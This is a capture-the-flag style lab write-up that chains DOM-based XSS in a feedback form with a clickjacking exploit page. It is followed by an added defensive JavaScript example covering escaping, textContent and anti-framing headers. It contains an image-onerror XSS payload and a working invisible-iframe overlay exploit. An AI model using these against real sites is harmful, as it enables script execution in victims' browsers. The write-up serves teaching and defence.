Exploiting clickjacking vulnerability to trigger DOM based XSS
Description
This lab contains an XSS vulnerability that is triggered by a click. Construct a clickjacking attack that fools the user into clicking the "Click me" button to call the print() function.
Approach
After accessing the lab, I logged in with the provided credentials. Since this lab is about triggering DOM-based XSS through clickjacking, I started by looking for the XSS vulnerability.
I came across a feedback form whose submission carries the following (URL-encoded) fields:
name=ichyaboy
email=ichyaboy%40hacker.com
subject=Shikamaru
message=nothing+to+be+written+here
I noticed that my input in the Name field is reflected in a span after the form is submitted:
<span id="feedbackResult">Thank you for submitting feedback, ichyaboy!</span>
I immediately injected a simple XSS payload into the Name field to trigger an alert:
<img src=1 onerror=alert(1)>
After filling in the other fields and submitting the form, the alert box popped up, confirming the DOM-based XSS. Next I needed to build the exploit HTML page. It would contain an invisible iframe rendering the feedback page with every field already filled in through the query string, so that no "empty field" validation gets in the way, and a simple "CLICK ME" label placed directly over the invisible "Submit feedback" button.
My exploit page looked like this:
<style>
    iframe {
        position: relative;
        width: 1000px;
        height: 1000px;
        opacity: 0.00001;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 805px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>CLICK ME</div>
<iframe src="https://0a2600ad037005ba82aebb0e005b0096.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=ichyaboyboy@hacker.com&subject=nothing&message=nothing"></iframe>
This HTML page has two main elements: an iframe and a div. The iframe contains the /feedback page and is given position: relative, so it stays within the normal document flow. The div containing the "CLICK ME" text is given position: absolute, so it is taken out of the flow and neither affects nor is affected by the layout of other elements. Because both elements are positioned, their z-index values apply: the iframe (z-index 2) is stacked above the div (z-index 1), so a click at that spot goes to the iframe rather than to the text, while the near-zero opacity lets the text show through.
When the victim visits the exploit page, they see only the "CLICK ME" text. Clicking this text, which is not an actual link or button, actually lands on the "Submit feedback" button of the iframe laid over it; with an opacity of 0.00001 the iframe is practically invisible to the user. Since the whole form is already filled in, the form is submitted successfully and the XSS is triggered.
Copying this exploit into the body of the HTML page on the exploit server and delivering it to the victim solves the lab, confirming that the XSS payload executed.
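As the defender's counterpart to the chain above, the following is an added example and not code from the original write-up or from the lab. It assumes, because the page does not show the sink, that the feedback page builds its thank-you message client-side from the name parameter and assigns it with innerHTML. It shows the message rendered with the name escaped (the textContent alternative is noted in a comment), the response headers that stop other origins from framing the page, and a simplified check of whether a set of response headers still leaves a page framable cross-origin. The names escapeHtml, renderFeedbackUnsafe, renderFeedbackSafe, antiFramingHeaders and isFramableCrossOrigin are chosen here and are not from the lab.

```javascript
// Added defensive example; not code from the original write-up or from the lab.
// Hypothetical assumption: the feedback page assigns the "name" parameter to
// the #feedbackResult span through innerHTML (the page does not show the sink).
'use strict';

// Escape the five characters that matter inside an HTML text node or attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical vulnerable sink: the untrusted name is interpolated straight into markup.
function renderFeedbackUnsafe(name) {
  return `<span id="feedbackResult">Thank you for submitting feedback, ${name}!</span>`;
}

// Hardened form: same message, but the name is escaped so any tags stay inert text.
function renderFeedbackSafe(name) {
  return `<span id="feedbackResult">Thank you for submitting feedback, ${escapeHtml(name)}!</span>`;
}
// In the browser the preferred fix avoids innerHTML entirely:
//   document.getElementById('feedbackResult').textContent =
//     `Thank you for submitting feedback, ${name}!`;
// textContent never parses its argument as HTML, so no escaping is needed.

// Headers that stop other origins from framing the page, which breaks the
// clickjacking half of the chain even if a click-triggered bug remains.
function antiFramingHeaders() {
  return {
    'content-security-policy': "frame-ancestors 'self'",
    'x-frame-options': 'SAMEORIGIN',
  };
}

// Simplified check: can a page on another origin embed a response carrying
// these headers? Header names are expected lowercased, as Node's http module
// delivers them. A CSP frame-ancestors directive takes precedence when present;
// otherwise X-Frame-Options decides.
function isFramableCrossOrigin(headers) {
  const csp = headers['content-security-policy'] || '';
  const directive = csp
    .split(';')
    .map((d) => d.trim())
    .find((d) => d.startsWith('frame-ancestors'));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    // Any source other than 'self' or 'none' lets some foreign ancestor frame the page.
    return sources.some((s) => s !== "'self'" && s !== "'none'");
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  return xfo !== 'DENY' && xfo !== 'SAMEORIGIN';
}

// Constructed sample input: the payload from the write-up, run through both renderers.
const SAMPLE_NAME = '<img src=1 onerror=alert(1)>';
console.log(renderFeedbackUnsafe(SAMPLE_NAME));
console.log(renderFeedbackSafe(SAMPLE_NAME));
console.log('framable with no headers:', isFramableCrossOrigin({}));
console.log('framable with fix:', isFramableCrossOrigin(antiFramingHeaders()));
```

Either fix alone breaks the chain described in the write-up: escaping (or textContent) removes the click-triggered XSS, and frame-ancestors removes the ability to stack the feedback page under a decoy. Shipping both is the usual choice, since the framing check also protects any other click-driven action on the page.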